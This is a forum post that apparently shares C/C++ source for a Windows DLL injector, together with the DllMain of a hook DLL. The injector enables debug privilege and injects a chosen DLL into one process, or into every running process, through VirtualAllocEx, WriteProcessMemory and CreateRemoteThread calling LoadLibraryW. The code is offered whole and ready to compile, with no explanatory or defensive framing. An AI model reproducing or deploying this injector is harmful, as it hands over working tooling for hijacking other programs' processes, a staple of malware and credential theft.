15,471
社区成员
发帖
与我相关
我的任务
分享
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
{
ofstream f1("c:\\xhook.txt", ios_base::app);
if(f1)
{
f1<<"xhook.dll:DllMain"<<endl;
f1.close();
}
}
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
CreateThread(0, 0, mainfn, 0, 0, 0);
{
ofstream f1("c:\\xhook.txt", ios_base::app);
if(f1)
{
f1<<"xhook.dll:DLL_PROCESS_ATTACH"<<endl;
f1.close();
}
}
break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
/***************************************************************|
code ripped from jiurl at mail.china.com
modifed by eyas <eyas at xfocus.org>
/***************************************************************/
#include <winsock2.h>
#include <stdio.h>
#include <tlhelp32.h>
#pragma comment (lib,"Advapi32.lib")
int inject(DWORD pid, char *dll);
BOOL SetPrivilege()
{
TOKEN_PRIVILEGES tp;
LUID luid;
HANDLE hToken;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken))
{
printf("\nOpen Current Process Token failed:%d",GetLastError());
}
//printf("\nOpen Current Process Token ok!");
if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&luid))
{
printf("\nLookupPrivilegeValue error:%d", GetLastError() );
return FALSE;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
//if (bEnablePrivilege)
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
//else
// tp.Privileges[0].Attributes = 0;
// Enable the privilege or disable all privileges.
AdjustTokenPrivileges(
hToken,
FALSE,
&tp,
sizeof(TOKEN_PRIVILEGES),
(PTOKEN_PRIVILEGES) NULL,
(PDWORD) NULL);
// Call GetLastError to determine whether the function succeeded.
if (GetLastError() != ERROR_SUCCESS)
{
printf("AdjustTokenPrivileges failed: %u\n", GetLastError() );
return FALSE;
}
return TRUE;
}
void main(int argc, char **argv)
{
DWORD pid;
HANDLE hSnapshot = NULL;
PROCESSENTRY32 pe;
if(argc!=3)
{
printf( "code ripped from jiurl <jiurl at mail.china.com>\n"
"modifed by eyas <eyas at xfocus.org>\n"
"Usage: %s <dll_full_path)> <pid>\n\n"
"pid != 0 -> inject dll to specify process\n"
"pid == 0 -> inject dll to all process\n", argv[0]);
return;
}
SetPrivilege();
pid = atoi(argv[2]);
if(pid)
inject(pid, argv[1]);
//inject to all process
else
{
hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
pe.dwSize = sizeof(PROCESSENTRY32);
Process32First(hSnapshot,&pe);
do
{
inject(pe.th32ProcessID, argv[1]);
}
while(Process32Next(hSnapshot,&pe)==TRUE);
CloseHandle (hSnapshot);
}
}
int inject(DWORD pid, char *dll)
{
PWSTR pszLibFileRemote = NULL;
HANDLE hRemoteProcess = NULL,hRemoteThread = NULL;
char CurPath[256];
hRemoteProcess = OpenProcess(
PROCESS_QUERY_INFORMATION | // Required by Alpha
PROCESS_CREATE_THREAD | // For CreateRemoteThread
PROCESS_VM_OPERATION | // For VirtualAllocEx/VirtualFreeEx
PROCESS_VM_WRITE, // For WriteProcessMemory
FALSE, pid);
//GetCurrentDirectory(256,CurPath);
//strcat(CurPath,"\\");
memset(CurPath, 0, sizeof(CurPath));
strcat(CurPath, dll);
int len = (strlen(CurPath)+1)*2;
WCHAR wCurPath[256];
MultiByteToWideChar(CP_ACP,0,CurPath,-1,wCurPath,256);
pszLibFileRemote = (PWSTR)
VirtualAllocEx(hRemoteProcess, NULL, len, MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hRemoteProcess, pszLibFileRemote,
(PVOID) wCurPath, len, NULL);
PTHREAD_START_ROUTINE pfnThreadRtn = (PTHREAD_START_ROUTINE)
GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
hRemoteThread = CreateRemoteThread(hRemoteProcess, NULL, 0,
pfnThreadRtn, pszLibFileRemote, 0, NULL);
if(hRemoteThread == NULL)
printf("[-] inject \"%s\" to %d failed.\n", dll, pid);
else
printf("[+] inject \"%s\" to %d success.\n", dll, pid);
return 0;
}